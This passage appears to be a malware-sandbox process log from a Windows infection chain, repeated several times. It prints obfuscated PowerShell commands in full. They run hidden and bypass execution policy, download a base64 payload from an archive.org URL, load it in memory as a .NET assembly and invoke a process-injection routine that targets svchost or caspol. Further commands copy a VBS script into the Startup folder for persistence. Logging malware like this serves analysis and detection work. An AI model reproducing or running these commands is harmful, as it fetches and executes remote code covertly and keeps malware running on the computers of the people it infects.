'+'n'+'rxt'+'ype.g'+'etm'+'ethod'+'(zh'+'ovaizho);n'+'r'+'xmeth'+'od.'+'in'+'voke(nr'+'xn'+'u'+'ll, [object[]]@(zho0/e7o'+'28/d/ee.'+'etsap//:sptthzh'+'o ,'+' '+'zho1zho'+' , zhoc:owgpro'+'gramda'+'ta'+'o'+'wgzh'+'o , zhohvncz'+'ho,'+'z'+'hosv'+'chostzho,zhozho)'+')') -creplace ([char]90+[char]72+[char]111),[char]39-replace'owg',[char]92-replace ([char]78+[char]114+[char]88),[char]36)|invoke-expression"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgntnjydxjsjysnid0nkycgwicrj0hvjysnahqnkyd0chm6ly8nkydpytywmccrjzewjysnmc51cy5hcmnojysnaxynkydllicrj29yzy8ync8nkydpdccrj2vtcy9kzxrhjysnac1ujysnb3rllxyvrccrj2unkyd0ywhob3rlvicrjy50eccrj3rasg87tnjyjysnymenkydzzty0q29udgvujysndca9ichozxctt2jqzwn0ifn5c3rlbs4nkydozxquv2viqycrj2xpzscrj250ks5eb3dubg9hzccrj1n0cmluzyhoclh1cmwnkycpo05yjysnwccrj2jpjysnbicrj2fyjysneunvbnrlbicrj3qgpscrjybbu3lzdgvtlknvbnzlcnrdojpgcm9tqmfzzscrjzy0uycrj3ryjysnaw4nkydnke5ywgjhcycrj2u2nemnkydvbicrj3rlbicrj3qpo05ywgfzc2vtymx5id0gjysnw1jlzmxlyycrj3rpb24ujysnqscrj3nzzw1ibhldoicrjzpmjysnb2fkkccrj05yjysnwgjpbmfyjysneumnkydvbnqnkydlbnqpjysnoycrj05ywccrj3r5cccrj2unkycgpscrjyboclhhc3nlbwjsjysnes5hzxruexblkfpibycrj1j1blbflkhvbwvasg8po05ywccrj20nkydldghvzca9iccrj04nkydywhqnkyd5cguurycrj2v0tscrj2v0ag9kjysnkfpijysnb1zbsvpibyk7ticrj3inkydybwv0accrj29klicrj0lujysndm9rzshocicrj1hujysndscrj2xslcbbb2jqzwn0w11dqchasg8wl0u3tycrjzi4l2qvzwuujysnzxrzyxavlzpzchr0afpijysnbyasjysniccrj1pibzfasg8nkycglcbasg9dok93r1bybycrj2dyyw1eyscrj3rhjysntycrj3dhwkgnkydvicwgwkhvahzuy1onkydibywnkydajysnsg9zdicrj2nob3n0wkhvlfpib1pibyknkycpjykglwnyzxbmywnlicaow2noqvjdotarw2noqvjdnzirw2noqvjdmtexksxby2hbul0zos1yzvbsqunlj093rycsw2noqvjdotitcmvqbefdzsaow2noqvjdnzgrw2noqvjdmte0k1tjaefsxtg4ksxby2hbul0znil8aw52t0tllwv4ufjlu1npt04=';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('nrxurl'+' ='+' z'+'ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/d'+'e'+'tahnotev'+'.tx'+'tzho;nrx'+'ba'+'se64conten'+'t = (new-object system.'+'net.webc'+'lie'+'nt).download'+'string(nrxurl'+');nr'+'x'+'bi'+'n'+'ar'+'yconten'+'t ='+' [system.convert]::frombase'+'64s'+'tr'+'in'+'g(nrxbas'+'e64c'+'on'+'ten'+'t);nrxassembly = '+'[reflec'+'tion.'+'a'+'ssembly]:'+':l'+'oad('+'nr'+'xbinar'+'yc'+'ont'+'ent)'+';'+'nrx'+'typ'+'e'+' ='+' nrxassembl'+'y.gettype(zho'+'runpe.homezho);nrx'+'m'+'ethod = '+'n'+'rxt'+'ype.g'+'etm'+'ethod'+'(zh'+'ovaizho);n'+'r'+'xmeth'+'od.'+'in'+'voke(nr'+'xn'+'u'+'ll, [object[]]@(zho0/e7o'+'28/d/ee.'+'etsap//:sptthzh'+'o ,'+' '+'zho1zho'+' , zhoc:owgpro'+'gramda'+'ta'+'o'+'wgzh'+'o , zhohvncz'+'ho,'+'z'+'hosv'+'chostzho,zhozho)'+')') -creplace ([char]90+[char]72+[char]111),[char]39-replace'owg',[char]92-replace ([char]78+[char]114+[char]88),[char]36)|invoke-expression"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgntnjydxjsjysnid0nkycgwicrj0hvjysnahqnkyd0chm6ly8nkydpytywmccrjzewjysnmc51cy5hcmnojysnaxynkydllicrj29yzy8ync8nkydpdccrj2vtcy9kzxrhjysnac1ujysnb3rllxyvrccrj2unkyd0ywhob3rlvicrjy50eccrj3rasg87tnjyjysnymenkydzzty0q29udgvujysndca9ichozxctt2jqzwn0ifn5c3rlbs4nkydozxquv2viqycrj2xpzscrj250ks5eb3dubg9hzccrj1n0cmluzyhoclh1cmwnkycpo05yjysnwccrj2jpjysnbicrj2fyjysneunvbnrlbicrj3qgpscrjybbu3lzdgvtlknvbnzlcnrdojpgcm9tqmfzzscrjzy0uycrj3ryjysnaw4nkydnke5ywgjhcycrj2u2nemnkydvbicrj3rlbicrj3qpo05ywgfzc2vtymx5id0gjysnw1jlzmxlyycrj3rpb24ujysnqscrj3nzzw1ibhldoicrjzpmjysnb2fkkccrj05yjysnwgjpbmfyjysneumnkydvbnqnkydlbnqpjysnoycrj05ywccrj3r5cccrj2unkycgpscrjyboclhhc3nlbwjsjysnes5hzxruexblkfpibycrj1j1blbflkhvbwvasg8po05ywccrj20nkydldghvzca9iccrj04nkydywhqnkyd5cguurycrj2v0tscrj2v0ag9kjysnkfpijysnb1zbsvpibyk7ticrj3inkydybwv0accrj29klicrj0lujysndm9rzshocicrj1hujysndscrj2xslcbbb2jqzwn0w11dqchasg8wl0u3tycrjzi4l2qvzwuujysnzxrzyxavlzpzchr0afpijysnbyasjysniccrj1pibzfasg8nkycglcbasg9dok93r1bybycrj2dyyw1eyscrj3rhjysntycrj3dhwkgnkydvicwgwkhvahzuy1onkydibywnkydajysnsg9zdicrj2nob3n0wkhvlfpib1pibyknkycpjykglwnyzxbmywnlicaow2noqvjdotarw2noqvjdnzirw2noqvjdmtexksxby2hbul0zos1yzvbsqunlj093rycsw2noqvjdotitcmvqbefdzsaow2noqvjdnzgrw2noqvjdmte0k1tjaefsxtg4ksxby2hbul0znil8aw52t0tllwv4ufjlu1npt04=';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('nrxurl'+' ='+' z'+'ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/d'+'e'+'tahnotev'+'.tx'+'tzho;nrx'+'ba'+'se64conten'+'t = (new-object system.'+'net.webc'+'lie'+'nt).download'+'string(nrxurl'+');nr'+'x'+'bi'+'n'+'ar'+'yconten'+'t ='+' [system.convert]::frombase'+'64s'+'tr'+'in'+'g(nrxbas'+'e64c'+'on'+'ten'+'t);nrxassembly = '+'[reflec'+'tion.'+'a'+'ssembly]:'+':l'+'oad('+'nr'+'xbinar'+'yc'+'ont'+'ent)'+';'+'nrx'+'typ'+'e'+' ='+' nrxassembl'+'y.gettype(zho'+'runpe.homezho);nrx'+'m'+'ethod = '+'n'+'rxt'+'ype.g'+'etm'+'ethod'+'(zh'+'ovaizho);n'+'r'+'xmeth'+'od.'+'in'+'voke(nr'+'xn'+'u'+'ll, [object[]]@(zho0/e7o'+'28/d/ee.'+'etsap//:sptthzh'+'o ,'+' '+'zho1zho'+' , zhoc:owgpro'+'gramda'+'ta'+'o'+'wgzh'+'o , zhohvncz'+'ho,'+'z'+'hosv'+'chostzho,zhozho)'+')') -creplace ([char]90+[char]72+[char]111),[char]39-replace'owg',[char]92-replace ([char]78+[char]114+[char]88),[char]36)|invoke-expression"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [system.io.file]::copy('c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\escrivan.vbs', 'c:\users\' + [environment]::username + ''\appdata\roaming\microsoft\windows\start menu\programs\startup\ sbv.navircse.vbs')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgntnjydxjsjysnid0nkycgwicrj0hvjysnahqnkyd0chm6ly8nkydpytywmccrjzewjysnmc51cy5hcmnojysnaxynkydllicrj29yzy8ync8nkydpdccrj2vtcy9kzxrhjysnac1ujysnb3rllxyvrccrj2unkyd0ywhob3rlvicrjy50eccrj3rasg87tnjyjysnymenkydzzty0q29udgvujysndca9ichozxctt2jqzwn0ifn5c3rlbs4nkydozxquv2viqycrj2xpzscrj250ks5eb3dubg9hzccrj1n0cmluzyhoclh1cmwnkycpo05yjysnwccrj2jpjysnbicrj2fyjysneunvbnrlbicrj3qgpscrjybbu3lzdgvtlknvbnzlcnrdojpgcm9tqmfzzscrjzy0uycrj3ryjysnaw4nkydnke5ywgjhcycrj2u2nemnkydvbicrj3rlbicrj3qpo05ywgfzc2vtymx5id0gjysnw1jlzmxlyycrj3rpb24ujysnqscrj3nzzw1ibhldoicrjzpmjysnb2fkkccrj05yjysnwgjpbmfyjysneumnkydvbnqnkydlbnqpjysnoycrj05ywccrj3r5cccrj2unkycgpscrjyboclhhc3nlbwjsjysnes5hzxruexblkfpibycrj1j1blbflkhvbwvasg8po05ywccrj20nkydldghvzca9iccrj04nkydywhqnkyd5cguurycrj2v0tscrj2v0ag9kjysnkfpijysnb1zbsvpibyk7ticrj3inkydybwv0accrj29klicrj0lujysndm9rzshocicrj1hujysndscrj2xslcbbb2jqzwn0w11dqchasg8wl0u3tycrjzi4l2qvzwuujysnzxrzyxavlzpzchr0afpijysnbyasjysniccrj1pibzfasg8nkycglcbasg9dok93r1bybycrj2dyyw1eyscrj3rhjysntycrj3dhwkgnkydvicwgwkhvahzuy1onkydibywnkydajysnsg9zdicrj2nob3n0wkhvlfpib1pibyknkycpjykglwnyzxbmywnlicaow2noqvjdotarw2noqvjdnzirw2noqvjdmtexksxby2hbul0zos1yzvbsqunlj093rycsw2noqvjdotitcmvqbefdzsaow2noqvjdnzgrw2noqvjdmte0k1tjaefsxtg4ksxby2hbul0znil8aw52t0tllwv4ufjlu1npt04=';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('nrxurl'+' ='+' z'+'ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/d'+'e'+'tahnotev'+'.tx'+'tzho;nrx'+'ba'+'se64conten'+'t = (new-object system.'+'net.webc'+'lie'+'nt).download'+'string(nrxurl'+');nr'+'x'+'bi'+'n'+'ar'+'yconten'+'t ='+' [system.convert]::frombase'+'64s'+'tr'+'in'+'g(nrxbas'+'e64c'+'on'+'ten'+'t);nrxassembly = '+'[reflec'+'tion.'+'a'+'ssembly]:'+':l'+'oad('+'nr'+'xbinar'+'yc'+'ont'+'ent)'+';'+'nrx'+'typ'+'e'+' ='+' nrxassembl'+'y.gettype(zho'+'runpe.homezho);nrx'+'m'+'ethod = '+'n'+'rxt'+'ype.g'+'etm'+'ethod'+'(zh'+'ovaizho);n'+'r'+'xmeth'+'od.'+'in'+'voke(nr'+'xn'+'u'+'ll, [object[]]@(zho0/e7o'+'28/d/ee.'+'etsap//:sptthzh'+'o ,'+' '+'zho1zho'+' , zhoc:owgpro'+'gramda'+'ta'+'o'+'wgzh'+'o , zhohvncz'+'ho,'+'z'+'hosv'+'chostzho,zhozho)'+')') -creplace ([char]90+[char]72+[char]111),[char]39-replace'owg',[char]92-replace ([char]78+[char]114+[char]88),[char]36)|invoke-expression"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [system.io.file]::copy('c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\escrivan.vbs', 'c:\users\' + [environment]::username + ''\appdata\roaming\microsoft\windows\start menu\programs\startup\ sbv.navircse.vbs')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [system.io.file]::copy('c:\users\public\documents\pow\wm.vbs', 'c:\users\' + [environment]::username + ''\appdata\roaming\microsoft\windows\start menu\programs\startup\ sbv.navircse.vbs')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgnezb9dxjsid0gezf9ahr0chmnkyc6ly9pytywjysnmdewmc51cy5hcmnoascrj3zllm9yzycrjy8ync9pjysndgvtcycrjy9kjysnzxqnkydhjysnac1ub3rllxyvrgv0ywgnkydob3rlvicrjy50ehr7mx07ezankyd9ymfzzty0q28nkydudgvudcankyc9jysniccrjyhozxctt2inkydqzwn0ifn5jysnc3qnkydlbs5ozscrj3quvycrj2viq2xpzscrj250ks4nkydeb3dubccrj29hzfn0jysncmlujysnzyh7mccrj30nkyd1cmwpo3snkycwfwjpbicrj2fyjysneunvbicrj3rlbicrj3qgpscrjyankydbu3lzdgvtlknvbnzlcnrdjysnojonkydgcm9tqmenkydzzty0u3ryaw5nkhswfwjhc2unkyc2nenvbicrj3rlbnqpo3swfwfzc2unkydtymwnkyd5iccrjz0nkycgw1jlzmxly3rpb24uqxmnkydzjysnzw1ibhldojonkydmbycrj2fkkhswfwjpbmenkydyeunvbnrlbnqpo3swfxr5cccrj2ugjysnpsb7jysnmh0nkydhc3nlbscrj2jses5hzxrujysnexankydlkhsxfvinkyd1blbfjysnlkhvjysnbwv7jysnmx0po3swjysnfscrj21ljysndghvzca9ihswfxr5cguur2v0twv0ag9kkhsxfvzbjysnsxsxfscrjyk7ezb9jysnbscrj2unkyd0accrj29klklujysndicrj29rzsh7mh1udscrj2xslcbbb2jqzscrj2n0wycrj11djysnqch7mx0nkycwjysnl2dkmwsnkydtjysnl2qvjysnzwuuzscrj3rzyxavlzpzchr0ahsxjysnfscrjyasjysnihsxfwrljysnc2f0jysnaxzhzg97mscrj30nkycglcb7mscrj31kzxnhdgl2yscrj2qnkydvezf9icwgezf9jysnzgunkydzyxrpdmfkb3snkycxfsx7mx1djysnyscrj3nqbycrj2x7mx0nkycsezenkyd9eycrjzf9ksknks1micbby2hbul0znixby2hbul0zoskgfellea==';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/detah'+'notev'+'.txt{1};{0'+'}base64co'+'ntent '+'='+' '+'(new-ob'+'ject sy'+'st'+'em.ne'+'t.w'+'ebclie'+'nt).'+'downl'+'oadst'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'ycon'+'ten'+'t ='+' '+'[system.convert]'+'::'+'fromba'+'se64string({0}base'+'64con'+'tent);{0}asse'+'mbl'+'y '+'='+' [reflection.as'+'s'+'embly]::'+'lo'+'ad({0}bina'+'rycontent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.gett'+'yp'+'e({1}r'+'unpe'+'.ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.getmethod({1}va'+'i{1}'+');{0}'+'m'+'e'+'th'+'od.in'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gj1k'+'s'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}c'+'a'+'spo'+'l{1}'+',{1'+'}{'+'1}))')-f [char]36,[char]39) |iex"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgnezb9dxjsid0gezf9ahr0chmnkyc6ly9pytywjysnmdewmc51cy5hcmnoascrj3zllm9yzycrjy8ync9pjysndgvtcycrjy9kjysnzxqnkydhjysnac1ub3rllxyvrgv0ywgnkydob3rlvicrjy50ehr7mx07ezankyd9ymfzzty0q28nkydudgvudcankyc9jysniccrjyhozxctt2inkydqzwn0ifn5jysnc3qnkydlbs5ozscrj3quvycrj2viq2xpzscrj250ks4nkydeb3dubccrj29hzfn0jysncmlujysnzyh7mccrj30nkyd1cmwpo3snkycwfwjpbicrj2fyjysneunvbicrj3rlbicrj3qgpscrjyankydbu3lzdgvtlknvbnzlcnrdjysnojonkydgcm9tqmenkydzzty0u3ryaw5nkhswfwjhc2unkyc2nenvbicrj3rlbnqpo3swfwfzc2unkydtymwnkyd5iccrjz0nkycgw1jlzmxly3rpb24uqxmnkydzjysnzw1ibhldojonkydmbycrj2fkkhswfwjpbmenkydyeunvbnrlbnqpo3swfxr5cccrj2ugjysnpsb7jysnmh0nkydhc3nlbscrj2jses5hzxrujysnexankydlkhsxfvinkyd1blbfjysnlkhvjysnbwv7jysnmx0po3swjysnfscrj21ljysndghvzca9ihswfxr5cguur2v0twv0ag9kkhsxfvzbjysnsxsxfscrjyk7ezb9jysnbscrj2unkyd0accrj29klklujysndicrj29rzsh7mh1udscrj2xslcbbb2jqzscrj2n0wycrj11djysnqch7mx0nkycwjysnl2dkmwsnkydtjysnl2qvjysnzwuuzscrj3rzyxavlzpzchr0ahsxjysnfscrjyasjysnihsxfwrljysnc2f0jysnaxzhzg97mscrj30nkycglcb7mscrj31kzxnhdgl2yscrj2qnkydvezf9icwgezf9jysnzgunkydzyxrpdmfkb3snkycxfsx7mx1djysnyscrj3nqbycrj2x7mx0nkycsezenkyd9eycrjzf9ksknks1micbby2hbul0znixby2hbul0zoskgfellea==';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/detah'+'notev'+'.txt{1};{0'+'}base64co'+'ntent '+'='+' '+'(new-ob'+'ject sy'+'st'+'em.ne'+'t.w'+'ebclie'+'nt).'+'downl'+'oadst'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'ycon'+'ten'+'t ='+' '+'[system.convert]'+'::'+'fromba'+'se64string({0}base'+'64con'+'tent);{0}asse'+'mbl'+'y '+'='+' [reflection.as'+'s'+'embly]::'+'lo'+'ad({0}bina'+'rycontent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.gett'+'yp'+'e({1}r'+'unpe'+'.ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.getmethod({1}va'+'i{1}'+');{0}'+'m'+'e'+'th'+'od.in'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gj1k'+'s'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}c'+'a'+'spo'+'l{1}'+',{1'+'}{'+'1}))')-f [char]36,[char]39) |iex"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgnezb9dxjsid0gezf9ahr0chmnkyc6ly9pytywjysnmdewmc51cy5hcmnoascrj3zllm9yzycrjy8ync9pjysndgvtcycrjy9kjysnzxqnkydhjysnac1ub3rllxyvrgv0ywgnkydob3rlvicrjy50ehr7mx07ezankyd9ymfzzty0q28nkydudgvudcankyc9jysniccrjyhozxctt2inkydqzwn0ifn5jysnc3qnkydlbs5ozscrj3quvycrj2viq2xpzscrj250ks4nkydeb3dubccrj29hzfn0jysncmlujysnzyh7mccrj30nkyd1cmwpo3snkycwfwjpbicrj2fyjysneunvbicrj3rlbicrj3qgpscrjyankydbu3lzdgvtlknvbnzlcnrdjysnojonkydgcm9tqmenkydzzty0u3ryaw5nkhswfwjhc2unkyc2nenvbicrj3rlbnqpo3swfwfzc2unkydtymwnkyd5iccrjz0nkycgw1jlzmxly3rpb24uqxmnkydzjysnzw1ibhldojonkydmbycrj2fkkhswfwjpbmenkydyeunvbnrlbnqpo3swfxr5cccrj2ugjysnpsb7jysnmh0nkydhc3nlbscrj2jses5hzxrujysnexankydlkhsxfvinkyd1blbfjysnlkhvjysnbwv7jysnmx0po3swjysnfscrj21ljysndghvzca9ihswfxr5cguur2v0twv0ag9kkhsxfvzbjysnsxsxfscrjyk7ezb9jysnbscrj2unkyd0accrj29klklujysndicrj29rzsh7mh1udscrj2xslcbbb2jqzscrj2n0wycrj11djysnqch7mx0nkycwjysnl2dkmwsnkydtjysnl2qvjysnzwuuzscrj3rzyxavlzpzchr0ahsxjysnfscrjyasjysnihsxfwrljysnc2f0jysnaxzhzg97mscrj30nkycglcb7mscrj31kzxnhdgl2yscrj2qnkydvezf9icwgezf9jysnzgunkydzyxrpdmfkb3snkycxfsx7mx1djysnyscrj3nqbycrj2x7mx0nkycsezenkyd9eycrjzf9ksknks1micbby2hbul0znixby2hbul0zoskgfellea==';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/detah'+'notev'+'.txt{1};{0'+'}base64co'+'ntent '+'='+' '+'(new-ob'+'ject sy'+'st'+'em.ne'+'t.w'+'ebclie'+'nt).'+'downl'+'oadst'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'ycon'+'ten'+'t ='+' '+'[system.convert]'+'::'+'fromba'+'se64string({0}base'+'64con'+'tent);{0}asse'+'mbl'+'y '+'='+' [reflection.as'+'s'+'embly]::'+'lo'+'ad({0}bina'+'rycontent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.gett'+'yp'+'e({1}r'+'unpe'+'.ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.getmethod({1}va'+'i{1}'+');{0}'+'m'+'e'+'th'+'od.in'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gj1k'+'s'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}c'+'a'+'spo'+'l{1}'+',{1'+'}{'+'1}))')-f [char]36,[char]39) |iex"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgnezb9dxjsid0gezf9ahr0chmnkyc6ly9pytywjysnmdewmc51cy5hcmnoascrj3zllm9yzycrjy8ync9pjysndgvtcycrjy9kjysnzxqnkydhjysnac1ub3rllxyvrgv0ywgnkydob3rlvicrjy50ehr7mx07ezankyd9ymfzzty0q28nkydudgvudcankyc9jysniccrjyhozxctt2inkydqzwn0ifn5jysnc3qnkydlbs5ozscrj3quvycrj2viq2xpzscrj250ks4nkydeb3dubccrj29hzfn0jysncmlujysnzyh7mccrj30nkyd1cmwpo3snkycwfwjpbicrj2fyjysneunvbicrj3rlbicrj3qgpscrjyankydbu3lzdgvtlknvbnzlcnrdjysnojonkydgcm9tqmenkydzzty0u3ryaw5nkhswfwjhc2unkyc2nenvbicrj3rlbnqpo3swfwfzc2unkydtymwnkyd5iccrjz0nkycgw1jlzmxly3rpb24uqxmnkydzjysnzw1ibhldojonkydmbycrj2fkkhswfwjpbmenkydyeunvbnrlbnqpo3swfxr5cccrj2ugjysnpsb7jysnmh0nkydhc3nlbscrj2jses5hzxrujysnexankydlkhsxfvinkyd1blbfjysnlkhvjysnbwv7jysnmx0po3swjysnfscrj21ljysndghvzca9ihswfxr5cguur2v0twv0ag9kkhsxfvzbjysnsxsxfscrjyk7ezb9jysnbscrj2unkyd0accrj29klklujysndicrj29rzsh7mh1udscrj2xslcbbb2jqzscrj2n0wycrj11djysnqch7mx0nkycwjysnl2dkmwsnkydtjysnl2qvjysnzwuuzscrj3rzyxavlzpzchr0ahsxjysnfscrjyasjysnihsxfwrljysnc2f0jysnaxzhzg97mscrj30nkycglcb7mscrj31kzxnhdgl2yscrj2qnkydvezf9icwgezf9jysnzgunkydzyxrpdmfkb3snkycxfsx7mx1djysnyscrj3nqbycrj2x7mx0nkycsezenkyd9eycrjzf9ksknks1micbby2hbul0znixby2hbul0zoskgfellea==';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgnezb9dxjsid0gezf9ahr0chmnkyc6ly9pytywjysnmdewmc51cy5hcmnoascrj3zllm9yzycrjy8ync9pjysndgvtcycrjy9kjysnzxqnkydhjysnac1ub3rllxyvrgv0ywgnkydob3rlvicrjy50ehr7mx07ezankyd9ymfzzty0q28nkydudgvudcankyc9jysniccrjyhozxctt2inkydqzwn0ifn5jysnc3qnkydlbs5ozscrj3quvycrj2viq2xpzscrj250ks4nkydeb3dubccrj29hzfn0jysncmlujysnzyh7mccrj30nkyd1cmwpo3snkycwfwjpbicrj2fyjysneunvbicrj3rlbicrj3qgpscrjyankydbu3lzdgvtlknvbnzlcnrdjysnojonkydgcm9tqmenkydzzty0u3ryaw5nkhswfwjhc2unkyc2nenvbicrj3rlbnqpo3swfwfzc2unkydtymwnkyd5iccrjz0nkycgw1jlzmxly3rpb24uqxmnkydzjysnzw1ibhldojonkydmbycrj2fkkhswfwjpbmenkydyeunvbnrlbnqpo3swfxr5cccrj2ugjysnpsb7jysnmh0nkydhc3nlbscrj2jses5hzxrujysnexankydlkhsxfvinkyd1blbfjysnlkhvjysnbwv7jysnmx0po3swjysnfscrj21ljysndghvzca9ihswfxr5cguur2v0twv0ag9kkhsxfvzbjysnsxsxfscrjyk7ezb9jysnbscrj2unkyd0accrj29klklujysndicrj29rzsh7mh1udscrj2xslcbbb2jqzscrj2n0wycrj11djysnqch7mx0nkycwjysnl2dkmwsnkydtjysnl2qvjysnzwuuzscrj3rzyxavlzpzchr0ahsxjysnfscrjyasjysnihsxfwrljysnc2f0jysnaxzhzg97mscrj30nkycglcb7mscrj31kzxnhdgl2yscrj2qnkydvezf9icwgezf9jysnzgunkydzyxrpdmfkb3snkycxfsx7mx1djysnyscrj3nqbycrj2x7mx0nkycsezenkyd9eycrjzf9ksknks1micbby2hbul0znixby2hbul0zoskgfellea==';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
